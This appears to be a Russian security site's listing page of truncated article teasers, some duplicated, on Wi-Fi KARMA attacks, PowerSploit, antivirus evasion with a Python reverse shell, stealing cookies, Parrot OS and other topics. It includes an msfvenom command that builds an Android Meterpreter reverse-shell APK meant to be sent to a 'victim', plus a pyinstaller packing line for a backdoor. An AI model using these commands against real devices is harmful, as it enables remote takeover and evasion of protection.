-
🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»
🛡 Научитесь находить и использовать уязвимости веб-приложений.
🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.Доступ открыт прямо сейчас — Записаться бесплатно
Кибербезопасность
По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.
Soft KARMA-атака с FruityWifi
Не мог пропустить такое интересное направление атак на беспроводные сети как KARMA. Самое известное воплощение этой уязвимости легендарный роутер/аппаратный сниффер Pineapple Mark от компании Hak5.
Сей девайс собирает beacon-фреймы, содержащие названия точек доступа. Каждое устройство, подключавшееся ранее по WiFi сохраняет у себя SSID знакомых точек, чтобы подключиться, когда снова будет в зоне его покрытия. Эти "имена" точек доступа потом используются чтобы притвориться знакомой ранее точкой. При переключении никакой авторизации не требуется, устройство будет полагать что оно подключено к "домашнему" вайфаю. Второй важный момент - устройство глушит настоящую точку доступа.
В итоге мы получает "злого двойника", который глушит настоящую точку доступа и автоматически переключает клиентов в обход авторизации.
Лично мне зачастую лень ждать перебора WPS reaver-ом или bully. А если у точки стоит ограничение 10 попыток в 5 минут, перебор занимает несколько суток...
Сей девайс собирает beacon-фреймы, содержащие названия точек доступа. Каждое устройство, подключавшееся ранее по WiFi сохраняет у себя SSID знакомых точек, чтобы подключиться, когда снова будет в зоне его покрытия. Эти "имена" точек доступа потом используются чтобы притвориться знакомой ранее точкой. При переключении никакой авторизации не требуется, устройство будет полагать что оно подключено к "домашнему" вайфаю. Второй важный момент - устройство глушит настоящую точку доступа.
В итоге мы получает "злого двойника", который глушит настоящую точку доступа и автоматически переключает клиентов в обход авторизации.
Лично мне зачастую лень ждать перебора WPS reaver-ом или bully. А если у точки стоит ограничение 10 попыток в 5 минут, перебор занимает несколько суток...
PowerShell для хакера (часть I )
Часть 1
Следующая частьВсе части
Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)
Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1
Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
Жмакним на клавишу RAW - что бы...
Статья Обход антивируса (Reverse Python Shell) 100% FUD
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
для упаковки в бинарный файл...
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
- reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
- может быть упакован в "exe" файл используя pyinstaller
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.pyСтатья Parrot Security OS
Привет, в этой статье речь пойдет о достаточно новой операционной системе Parrot.
Parrot Security OS (или ParrotSec) - является дистрибутивом GNU / Linux, на основе Debian. Он был спроектирован для того, чтобы выполнять тесты на проникновение (компьютерная безопасность) для оценки уязвимостей и смягчения последствий их использования, применяется он и в компьютерной криминалистике, а так же способен обеспечить анонимный серфинг. Был разработан командой Frozenbox.
Среда рабочего стола является MATE, и менеджер дисплея по умолчанию LightDM.
Проект сертифицирован для работы с машинами, которые имеют, по крайней мере, 256 Мб оперативной памяти, и одинаково подходит как для 32-разрядных (i386) так и для 64-разрядных (amd64) процессоров. Кроме того, проект доступен для ARMv7 (armhf) архитектур. Он даже предлагает релиз (32bit и 64bit), разработанный для серверов, только для выполнения облачного тестирования.
Чтобы установить эту ОС себе необходимо скачать образ (торрент) с...
Parrot Security OS (или ParrotSec) - является дистрибутивом GNU / Linux, на основе Debian. Он был спроектирован для того, чтобы выполнять тесты на проникновение (компьютерная безопасность) для оценки уязвимостей и смягчения последствий их использования, применяется он и в компьютерной криминалистике, а так же способен обеспечить анонимный серфинг. Был разработан командой Frozenbox.
Среда рабочего стола является MATE, и менеджер дисплея по умолчанию LightDM.
Проект сертифицирован для работы с машинами, которые имеют, по крайней мере, 256 Мб оперативной памяти, и одинаково подходит как для 32-разрядных (i386) так и для 64-разрядных (amd64) процессоров. Кроме того, проект доступен для ARMv7 (armhf) архитектур. Он даже предлагает релиз (32bit и 64bit), разработанный для серверов, только для выполнения облачного тестирования.
Чтобы установить эту ОС себе необходимо скачать образ (торрент) с...
Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.
Установка и использование msfvenom payload:
1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)
Файл apk сохранен в базовую папку.
4...
Установка и использование msfvenom payload:
1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apkФайл apk сохранен в базовую папку.
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4...
Статья Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств
Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств для новичков и профессионалов. Платформа пользуется огромной популярностью во всем мире благодаря удобству и простоте языка программирования, а также открытой архитектуре и программному коду. Устройство программируется через USB без использования программаторов.
Arduino позволяет компьютеру выйти за рамки виртуального мира в физический и взаимодействовать с ним. Устройства на базе Arduino могут получать информацию об окружающей среде посредством различных датчиков, а также могут управлять различными исполнительными устройствами.
Микроконтроллер на плате программируется при помощи языка Arduino (основан на языке Wiring) и среды разработки Arduino (основана на среде Processing). Проекты устройств, основанные на Arduino, могут работать самостоятельно, либо же взаимодействовать с программным обеспечением на компьютере (напр.: Flash, Processing, MaxMSP). Платы могут быть собраны...
Arduino позволяет компьютеру выйти за рамки виртуального мира в физический и взаимодействовать с ним. Устройства на базе Arduino могут получать информацию об окружающей среде посредством различных датчиков, а также могут управлять различными исполнительными устройствами.
Микроконтроллер на плате программируется при помощи языка Arduino (основан на языке Wiring) и среды разработки Arduino (основана на среде Processing). Проекты устройств, основанные на Arduino, могут работать самостоятельно, либо же взаимодействовать с программным обеспечением на компьютере (напр.: Flash, Processing, MaxMSP). Платы могут быть собраны...
Статья Как украсть Cookies (Wireshark + Parrot)
И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставаться без участия и выложить простой материал по данной теме. Нам с вами известно что программа
обладает незаменимым для нас функционалом.
Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите)
Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark .
На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы но все нужное...
Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите)
Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark .
На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы но все нужное...
Статья Хакерские плагины для Chrome
Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать.
Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является . Пусть нас не смущает слово «магазин» — все рассматриваемые ниже плагины бесплатные.
Cookie Manager
Управляет cookies и защищает приватность. Добавляет, редактирует и удаляет кукиз через панель инструментов. Может искать кукиз, если их много.
Функции
Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является . Пусть нас не смущает слово «магазин» — все рассматриваемые ниже плагины бесплатные.
Cookie Manager
Управляет cookies и защищает приватность. Добавляет, редактирует и удаляет кукиз через панель инструментов. Может искать кукиз, если их много.
Функции
- Поиск по кукиз
- Просмотр всех кукиз
- Просмотр кукиз по поддоменам
- Просмотр кукиз текущего домена
- Удаление всех кукиз (примечание: некоторые кукиз повторно создают себя после удаления. Поэтому они могут появиться вновь в списке после удаления)
- Удалить...
Статья Шифрование файлов на Android
Смартфоны уже для многих стали важным помощником в работе и развлечениях. Современные телефоны надёжно закрепились в наших схемах по получению, отправки, хранению, созданию и редактированию информации. Часть этой информации является конфиденциальной и очень важно защитить её в случаях, например, утери телефона или несанкционированного доступа к нему.
В этой статье будут рассмотрены программы именно для шифрования файлов, поскольку программ для шифрования и хранения прочей информации (паролей, финансовой информации и пр.) много и особых проблем при выборе не возникает. Что касается шифрования файлов, то здесь другая история. В Google Play я нашёл 3 подобных программы, заслуживающих внимания. Каждая из них ещё достаточно молода и бурно развивается. Анализируя их, я буду особенно заострять внимание на следующих критериях: совместимость создаваемых зашифрованных контейнеров с настольными ОС, удобство работы с файлами в контейнерах.
Это программы:
В этой статье будут рассмотрены программы именно для шифрования файлов, поскольку программ для шифрования и хранения прочей информации (паролей, финансовой информации и пр.) много и особых проблем при выборе не возникает. Что касается шифрования файлов, то здесь другая история. В Google Play я нашёл 3 подобных программы, заслуживающих внимания. Каждая из них ещё достаточно молода и бурно развивается. Анализируя их, я буду особенно заострять внимание на следующих критериях: совместимость создаваемых зашифрованных контейнеров с настольными ОС, удобство работы с файлами в контейнерах.
Это программы:
- LUKS Manager
- EDS Lite...
Hacker Lab
Категории блога
Наши курсы
Наши книги
